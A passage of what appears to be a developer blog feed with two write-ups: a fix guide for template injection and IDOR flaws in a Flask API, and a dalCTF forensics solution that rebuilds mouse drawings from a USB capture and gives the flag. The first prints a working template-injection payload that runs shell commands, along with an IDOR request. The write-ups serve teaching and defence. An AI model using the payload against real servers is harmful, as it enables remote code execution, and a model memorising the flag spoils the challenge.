</code></pre> </div> <p>This gives the attacker a shell on the server.</p> <h3> 2. Broken Object Level Authorization (BOLA / IDOR) on GET </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># VULNERABLE </span><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/api/users/&lt;user_id&gt;/data</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">get_user_data</span><span class="p">(</span><span class="n">user_id</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">_require_auth</span><span class="p">()</span> <span class="n">username</span> <span class="o">=</span> <span class="n">ID_TO_USER</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">user_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">profile</span><span class="sh">"</span><span class="p">:</span> <span class="n">USERS</span><span class="p">[</span><span class="n">username</span><span class="p">][</span><span class="sh">"</span><span class="s">profile</span><span class="sh">"</span><span class="p">]}),</span> <span class="mi">200</span> </code></pre> </div> <p>Any authenticated user can read <strong>any other user's profile</strong> by changing the <code>user_id</code> in the URL. The JWT is verified, but its <code>user_id</code> claim is never compared against the requested resource.</p> <h3> 3. Broken Object Level Authorization (BOLA / IDOR) on PUT </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># VULNERABLE </span><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/api/users/&lt;user_id&gt;/data</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">PUT</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">update_user_data</span><span class="p">(</span><span class="n">user_id</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">_require_auth</span><span class="p">()</span> <span class="n">username</span> <span class="o">=</span> <span class="n">ID_TO_USER</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">user_id</span><span class="p">)</span> <span class="n">bio</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">bio</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">USERS</span><span class="p">[</span><span class="n">username</span><span class="p">][</span><span class="sh">"</span><span class="s">profile</span><span class="sh">"</span><span class="p">][</span><span class="sh">"</span><span class="s">bio</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">bio</span> </code></pre> </div> <p>Same issue on write — any authenticated user can overwrite <strong>any other user's bio</strong>.</p> <h2> Fixes </h2> <h3> Fix 1 — SSTI: Never render user input as a template </h3> <p>Use a <strong>static template string with Jinja2 variables</strong>, and pass user data as context — never interpolate into the template source itself. Or skip Jinja2 entirely and use an f-string (since no template logic is needed here):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># FIXED — no Jinja2, no injection risk </span><span class="n">name</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">User</span><span class="sh">"</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Hello </span><span class="si">{</span><span class="n">name</span><span class="si">}</span><span class="s">! Here is your report for user </span><span class="si">{</span><span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">?</span><span class="sh">'</span><span class="p">)</span><span class="si">}</span><span class="s">.</span><span class="sh">"</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">report</span><span class="sh">"</span><span class="p">:</span> <span class="n">result</span><span class="p">}),</span> <span class="mi">200</span> </code></pre> </div> <p>The key insight: <code>name</code> appears in the <strong>output</strong>, not as part of the template syntax. An f-string achieves this safely without invoking Jinja2 at all.</p> <h3> Fix 2 &amp; 3 — BOLA: Enforce ownership on GET and PUT </h3> <p>Compare the <code>user_id</code> from the JWT payload against the <code>user_id</code> in the URL path. Reject if they don't match:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># FIXED </span><span class="k">if</span> <span class="nf">str</span><span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">))</span> <span class="o">!=</span> <span class="nf">str</span><span class="p">(</span><span class="n">user_id</span><span class="p">):</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Forbidden</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">403</span> </code></pre> </div> <p>Applied to both the GET and PUT routes before any data is accessed or modified.</p> <h2> Final Patched Code </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">json</span> <span class="kn">import</span> <span class="n">datetime</span> <span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">jsonify</span> <span class="kn">import</span> <span class="n">jwt</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">JWT_SECRET</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">JWT_SECRET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">dev_secret_change_me</span><span class="sh">"</span><span class="p">)</span> <span class="n">_raw</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">USERS_JSON</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">{}</span><span class="sh">"</span><span class="p">)</span> <span class="n">USERS</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="nf">loads</span><span class="p">(</span><span class="n">_raw</span><span class="p">)</span> <span class="n">ID_TO_USER</span> <span class="o">=</span> <span class="p">{</span><span class="n">v</span><span class="p">[</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">]:</span> <span class="n">k</span> <span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">USERS</span><span class="p">.</span><span class="nf">items</span><span class="p">()}</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/health</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">health</span><span class="p">():</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">ok</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">200</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="n">data</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="nf">get_json</span><span class="p">(</span><span class="n">silent</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="ow">or</span> <span class="p">{}</span> <span class="n">username</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">user</span> <span class="o">=</span> <span class="n">USERS</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">username</span><span class="p">)</span> <span class="k">if</span> <span class="n">user</span> <span class="ow">and</span> <span class="n">user</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">)</span> <span class="o">==</span> <span class="n">password</span><span class="p">:</span> <span class="n">token</span> <span class="o">=</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">encode</span><span class="p">(</span> <span class="p">{</span> <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span><span class="p">,</span> <span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">:</span> <span class="n">user</span><span class="p">[</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">],</span> <span class="sh">"</span><span class="s">exp</span><span class="sh">"</span><span class="p">:</span> <span class="n">datetime</span><span class="p">.</span><span class="n">datetime</span><span class="p">.</span><span class="nf">utcnow</span><span class="p">()</span> <span class="o">+</span> <span class="n">datetime</span><span class="p">.</span><span class="nf">timedelta</span><span class="p">(</span><span class="n">hours</span><span class="o">=</span><span class="mi">1</span><span class="p">),</span> <span class="p">},</span> <span class="n">JWT_SECRET</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">,</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">token</span><span class="sh">"</span><span class="p">:</span> <span class="n">token</span><span class="p">,</span> <span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">:</span> <span class="n">user</span><span class="p">[</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">]})</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Invalid credentials</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">401</span> <span class="k">def</span> <span class="nf">_decode_token</span><span class="p">(</span><span class="n">token</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">dict</span><span class="p">:</span> <span class="k">return</span> <span class="n">jwt</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">JWT_SECRET</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">_require_auth</span><span class="p">():</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">Authorization</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">).</span><span class="nf">replace</span><span class="p">(</span><span class="sh">"</span><span class="s">Bearer </span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span> <span class="k">raise</span> <span class="nc">Exception</span><span class="p">(</span><span class="sh">"</span><span class="s">Missing token</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">_decode_token</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/api/users/&lt;user_id&gt;/data</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">get_user_data</span><span class="p">(</span><span class="n">user_id</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">_require_auth</span><span class="p">()</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">401</span> <span class="c1"># FIX: enforce user can only access their own data </span> <span class="k">if</span> <span class="nf">str</span><span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">))</span> <span class="o">!=</span> <span class="nf">str</span><span class="p">(</span><span class="n">user_id</span><span class="p">):</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Forbidden</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">403</span> <span class="n">username</span> <span class="o">=</span> <span class="n">ID_TO_USER</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">user_id</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">username</span><span class="p">:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">User not found</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">404</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">profile</span><span class="sh">"</span><span class="p">:</span> <span class="n">USERS</span><span class="p">[</span><span class="n">username</span><span class="p">][</span><span class="sh">"</span><span class="s">profile</span><span class="sh">"</span><span class="p">]}),</span> <span class="mi">200</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/api/users/&lt;user_id&gt;/data</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">PUT</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">update_user_data</span><span class="p">(</span><span class="n">user_id</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">_require_auth</span><span class="p">()</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">401</span> <span class="c1"># FIX: enforce ownership </span> <span class="k">if</span> <span class="nf">str</span><span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">user_id</span><span class="sh">"</span><span class="p">))</span> <span class="o">!=</span> <span class="nf">str</span><span class="p">(</span><span class="n">user_id</span><span class="p">):</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Forbidden</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">403</span> <span class="n">username</span> <span class="o">=</span> <span class="n">ID_TO_USER</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">user_id</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">username</span><span class="p">:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">User not found</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">404</span> <span class="n">data</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="nf">get_json</span><span class="p">(</span><span class="n">silent</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="ow">or</span> <span class="p">{}</span> <span class="n">bio</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">bio</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">USERS</span><span class="p">[</span><span class="n">username</span><span class="p">][</span><span class="sh">"</span><span class="s">profile</span><span class="sh">"</span><span class="p">][</span><span class="sh">"</span><span class="s">bio</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="n">bio</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Profile updated</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">bio</span><span class="sh">"</span><span class="p">:</span> <span class="n">bio</span><span class="p">}),</span> <span class="mi">200</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/render</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">render_report</span><span class="p">():</span> <span class="k">try</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">_require_auth</span><span class="p">()</span> <span class="k">except</span> <span class="nb">Exception</span><span class="p">:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">401</span> <span class="n">data</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="nf">get_json</span><span class="p">(</span><span class="n">silent</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="ow">or</span> <span class="p">{}</span> <span class="n">name</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">User</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># FIX: plain f-string, user input never touches template engine </span> <span class="n">result</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Hello </span><span class="si">{</span><span class="n">name</span><span class="si">}</span><span class="s">! Here is your report for user </span><span class="si">{</span><span class="n">payload</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">?</span><span class="sh">'</span><span class="p">)</span><span class="si">}</span><span class="s">.</span><span class="sh">"</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">report</span><span class="sh">"</span><span class="p">:</span> <span class="n">result</span><span class="p">}),</span> <span class="mi">200</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span> <span class="n">app</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="sh">"</span><span class="s">0.0.0.0</span><span class="sh">"</span><span class="p">,</span> <span class="n">port</span><span class="o">=</span><span class="mi">5000</span><span class="p">)</span> </code></pre> </div> <h2> Summary of Changes </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Vulnerability</th> <th>Location</th> <th>Fix</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>SSTI (Remote Code Execution)</td> <td><code>/render</code></td> <td>Removed Jinja2 <code>Template</code> — use plain f-string</td> </tr> <tr> <td>2</td> <td>BOLA / IDOR (unauthorized read)</td> <td><code>GET /api/users/&lt;user_id&gt;/data</code></td> <td>Compare JWT <code>user_id</code> to URL param, return 403 if mismatch</td> </tr> <tr> <td>3</td> <td>BOLA / IDOR (unauthorized write)</td> <td><code>PUT /api/users/&lt;user_id&gt;/data</code></td> <td>Same ownership check before allowing update</td> </tr> </tbody> </table></div> <h2> Attack Demos (Original Vulnerable Code) </h2> <p><strong>SSTI RCE:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-X</span> POST /render <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer &lt;token&gt;"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"name": "{{ self.__init__.__globals__.__builtins__.__import__(\"os\").popen(\"id\").read() }}"}'</span> <span class="c"># Response: "Hello uid=0(root) gid=0(root)! Here is your report..."</span> </code></pre> </div> <p><strong>IDOR — read another user's profile:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Logged in as user_id=2, accessing user_id=1</span> curl /api/users/1/data <span class="nt">-H</span> <span class="s2">"Authorization: Bearer &lt;user2_token&gt;"</span> <span class="c"># Returns user 1's private profile data — no error</span> </code></pre> </div> <h2> Key Takeaways </h2> <ul> <li> <strong>Never render user input as a template.</strong> Pass it as a variable <em>into</em> a static template, or avoid the template engine entirely if no logic is needed.</li> <li> <strong>Authentication ≠ Authorization.</strong> Verifying a JWT proves <em>who</em> you are — you must still check <em>what</em> you're allowed to access. Always compare the token's identity claims against the requested resource.</li> <li> <strong>BOLA (Broken Object Level Authorization)</strong> is the #1 API vulnerability class (OWASP API Top 10). It's easy to miss because the endpoint works correctly for the legitimate user — it just doesn't restrict <em>which</em> user.</li> </ul> cybersecurity python security tutorial Weird Movements - dalCTF Yogeshwar Peela Mon, 08 Jun 2026 04:39:02 +0000 https://dev.to/exploitnotes/weird-movements-dalctf-3boj https://dev.to/exploitnotes/weird-movements-dalctf-3boj <p><strong>Category:</strong> Forensics<br> <strong>Flag:</strong> <code>dalctf{h3h3_i_s2_p41nt}</code></p> <h2> Overview </h2> <p>We're given a packet capture. The capture turns out to be a Linux USB HID (mouse) trace — the user held left-click and physically drew the flag on screen. The drawn text is ROT13-encoded, giving one extra layer of obfuscation.</p> <h2> Reconnaissance </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>file capture.pcap <span class="c"># pcap capture file, microsecond ts (little-endian) - version 2.4</span> <span class="c"># (Memory-mapped Linux USB, capture length 134217728)</span> </code></pre> </div> <p>The link type is <strong>220 (<code>LINKTYPE_USB_LINUX_MMAPPED</code>)</strong> — Linux USB captured via usbmon. Standard tools like Wireshark will decode this, but scapy treats it as raw since it doesn't recognise link type 220 natively.</p> <h2> Packet Structure </h2> <p>The capture contains 8618 packets. Parsing with scapy using the raw usbmon header layout:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">scapy.all</span> <span class="kn">import</span> <span class="n">rdpcap</span> <span class="kn">import</span> <span class="n">struct</span> <span class="n">packets</span> <span class="o">=</span> <span class="nf">rdpcap</span><span class="p">(</span><span class="sh">"</span><span class="s">capture.pcap</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>Each raw packet is a <code>usbmon_packet</code> struct (48 bytes) followed by the HID data payload. Key fields in the header:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Offset</th> <th>Field</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>8</td> <td>type</td> <td> <code>S</code>=submit, <code>C</code>=complete</td> </tr> <tr> <td>9</td> <td>transfer type</td> <td> <code>1</code> = interrupt</td> </tr> <tr> <td>10</td> <td>endpoint</td> <td> <code>0x81</code> = EP1 IN</td> </tr> <tr> <td>36</td> <td>data length</td> <td>4 bytes LE</td> </tr> </tbody> </table></div> <p>Filtering for <strong>interrupt IN</strong> packets with data gives 4254 HID reports — all mouse events.</p> <h2> HID Payload Layout </h2> <p>Each report is 20 bytes. The first 16 bytes are usbmon internal metadata (constant across packets). The actual HID data occupies bytes 16–19:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Byte</th> <th>Field</th> </tr> </thead> <tbody> <tr> <td>16</td> <td>buttons (0 = none, 1 = left click)</td> </tr> <tr> <td>17</td> <td>X delta (signed 8-bit)</td> </tr> <tr> <td>18</td> <td>Y delta (signed 8-bit)</td> </tr> <tr> <td>19</td> <td>scroll wheel</td> </tr> </tbody> </table></div> <h2> Extracting the Mouse Path </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">events</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">pkt</span> <span class="ow">in</span> <span class="n">packets</span><span class="p">:</span> <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">load</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">raw</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">48</span><span class="p">:</span> <span class="k">continue</span> <span class="k">if</span> <span class="n">raw</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span> <span class="ow">and</span> <span class="p">(</span><span class="n">raw</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0x80</span><span class="p">):</span> <span class="c1"># interrupt IN </span> <span class="n">data_len</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="nf">unpack_from</span><span class="p">(</span><span class="sh">"</span><span class="s">&lt;I</span><span class="sh">"</span><span class="p">,</span> <span class="n">raw</span><span class="p">,</span> <span class="mi">36</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="k">if</span> <span class="n">data_len</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="ow">and</span> <span class="nf">len</span><span class="p">(</span><span class="n">raw</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">48</span><span class="p">:</span> <span class="n">hid</span> <span class="o">=</span> <span class="n">raw</span><span class="p">[</span><span class="mi">48</span><span class="p">:]</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">hid</span><span class="p">)</span> <span class="o">&gt;=</span> <span class="mi">20</span><span class="p">:</span> <span class="n">btn</span> <span class="o">=</span> <span class="n">hid</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="n">dx</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="nf">unpack_from</span><span class="p">(</span><span class="sh">"</span><span class="s">b</span><span class="sh">"</span><span class="p">,</span> <span class="n">hid</span><span class="p">,</span> <span class="mi">17</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="n">dy</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="nf">unpack_from</span><span class="p">(</span><span class="sh">"</span><span class="s">b</span><span class="sh">"</span><span class="p">,</span> <span class="n">hid</span><span class="p">,</span> <span class="mi">18</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="n">events</span><span class="p">.</span><span class="nf">append</span><span class="p">((</span><span class="n">dx</span><span class="p">,</span> <span class="n">dy</span><span class="p">,</span> <span class="n">btn</span><span class="p">))</span> </code></pre> </div> <p>Reconstructing absolute position by accumulating deltas:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span> <span class="n">path</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">dx</span><span class="p">,</span> <span class="n">dy</span><span class="p">,</span> <span class="n">btn</span> <span class="ow">in</span> <span class="n">events</span><span class="p">:</span> <span class="n">x</span> <span class="o">+=</span> <span class="n">dx</span> <span class="n">y</span> <span class="o">+=</span> <span class="n">dy</span> <span class="n">path</span><span class="p">.</span><span class="nf">append</span><span class="p">((</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">btn</span><span class="p">))</span> </code></pre> </div> <ul> <li> <strong>Total points:</strong> 4254</li> <li> <strong>Clicked points (btn=1):</strong> 2783</li> <li> <strong>X range:</strong> −1021 to 340</li> <li> <strong>Y range:</strong> −197 to 99</li> </ul> <h2> Rendering the Drawing </h2> <p>Only points where <code>btn == 1</code> (left button held) are drawn. Connecting consecutive clicked points as line segments produces clean cursive-style strokes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">PIL</span> <span class="kn">import</span> <span class="n">Image</span><span class="p">,</span> <span class="n">ImageDraw</span> <span class="n">scale</span> <span class="o">=</span> <span class="mi">4</span> <span class="n">margin</span> <span class="o">=</span> <span class="mi">40</span> <span class="n">xmin</span><span class="p">,</span> <span class="n">ymin</span> <span class="o">=</span> <span class="nf">min</span><span class="p">(</span><span class="n">xs</span><span class="p">),</span> <span class="nf">min</span><span class="p">(</span><span class="n">ys</span><span class="p">)</span> <span class="n">w</span> <span class="o">=</span> <span class="p">(</span><span class="nf">max</span><span class="p">(</span><span class="n">xs</span><span class="p">)</span> <span class="o">-</span> <span class="n">xmin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">scale</span> <span class="o">+</span> <span class="mi">2</span><span class="o">*</span><span class="n">margin</span> <span class="n">h</span> <span class="o">=</span> <span class="p">(</span><span class="nf">max</span><span class="p">(</span><span 